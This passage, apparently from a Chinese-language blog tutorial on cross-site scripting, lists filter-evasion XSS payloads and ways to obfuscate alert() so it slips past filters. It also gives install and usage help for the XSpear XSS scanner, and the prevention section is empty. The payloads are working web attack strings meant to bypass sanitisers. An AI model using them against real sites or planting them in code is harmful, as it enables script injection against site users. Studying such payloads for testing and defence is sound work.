    &lt;style&gt;//*{x:expression(alert(/xss/))}//&lt;style&gt;&lt;/style&gt; 

    On Mouse Over​

    &lt;img src="/" =_=" title="onerror='prompt(1)'"&gt;

    &lt;a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&amp;#97v&amp;#97script:&amp;#97lert(1)&gt;ClickMe

    &lt;script x&gt; alert(1) &lt;/script 1=2

    &lt;form&gt;&lt;button formaction=javascript&amp;colon;alert(1)&gt;CLICKME

    &lt;input/onmouseover="javaSCRIPT&amp;colon;confirm&amp;lpar;1&amp;rpar;"

    &lt;iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"&gt;&lt;/iframe&gt;
</code></pre>

<h2 id="alert混淆以绕过过滤器">Alert混淆以绕过过滤器</h2>

<pre><code class="language-php+HTML">(alert)(1)

a=alert,a(1)

[1].find(alert)

top[“al”+”ert”](1)

top[/al/.source+/ert/.source](1)

al\u0065rt(1)

top[‘al\145rt’](1)

top[‘al\x65rt’](1)

top[8680439..toString(30)](1)
</code></pre>

<h1 id="xss扫描工具">xss扫描工具</h1>

<p>xspear</p>

<p>安装:</p>

<pre><code class="language-bash">gem install XSpear
</code></pre>

<blockquote>
  <p>需要root用户</p>
</blockquote>

<h2 id="基础用法">基础用法</h2>

<pre><code class="language-bash">Usage: xspear -u [target] -[options] [value]
[ e.g ]
$ xspear -u 'https://www.hahwul.com/?q=123' --cookie='role=admin' -v 1 -a 
$ xspear -u 'http://testphp.vulnweb.com/listproducts.php?cat=123' -v 2
$ xspear -u 'http://testphp.vulnweb.com/listproducts.php?cat=123' -v 0 -o json

[ Options ]
    -u, --url=target_URL             [required] Target Url
    -d, --data=POST Body             [optional] POST Method Body data
    -a, --test-all-params            [optional] test to all params(include not reflected)
        --no-xss                     [optional] no testing xss, only parameters analysis
        --headers=HEADERS            [optional] Add HTTP Headers
        --cookie=COOKIE              [optional] Add Cookie
        --custom-payload=FILENAME    [optional] Load custom payload json file
        --raw=FILENAME               [optional] Load raw file(e.g raw_sample.txt)
        --raw-ssl=BOOLEAN            [optional] http/https switch for burp raw file e.g: true/false
    -p, --param=PARAM                [optional] Test paramters
    -b, --BLIND=URL                  [optional] Add vector of Blind XSS
                                      + with XSS Hunter, ezXSS, HBXSS, etc...
                                      + e.g : -b https://hahwul.xss.ht
    -t, --threads=NUMBER             [optional] thread , default: 10
    -o, --output=FORMAT              [optional] Output format (cli , json, html)
    -c, --config=FILENAME            [optional] Using config.json
    -v, --verbose=0~3                [optional] Show log depth
                                      + v=0 : quite mode(only result)
                                      + v=1 : show scanning status(default)
                                      + v=2 : show scanning logs
                                      + v=3 : show detail log(req/res)
    -h, --help                       Prints this help
        --version                    Show XSpear version
        --update                     Show how to update

</code></pre>

<h1 id="xss防范">xss防范</h1>

</div>
<div class="v">
  <i class="fas fa-spinner fa-pulse"></i>
</div>
<script
  src='https://cdn.jsdelivr.net/npm/valine@1.4.14/dist/Valine.min.js'
  defer='defer'
  onload='
    new Valine({
      "el": document.getElementsByClassName("v")[0],
      "appId": "9hABRddSuEkTgqLrt1VSK5B1-gzGzoHsz",
      "appKey": "NJ7RwmgrxsF7KDzlqU7YewlL",
      "placeholder": "在这里评论吧！填写邮箱可以获得 Gravatar 头像和回复通知哦",
      "requiredFields": ["nick","mail"],
      "visitor": true,
      "recordIP": true
    })'
></script>

</div>
  </div>
  
  <label for="sidebar-checkbox" class="sidebar-toggle"></label>
  
</body>

</html>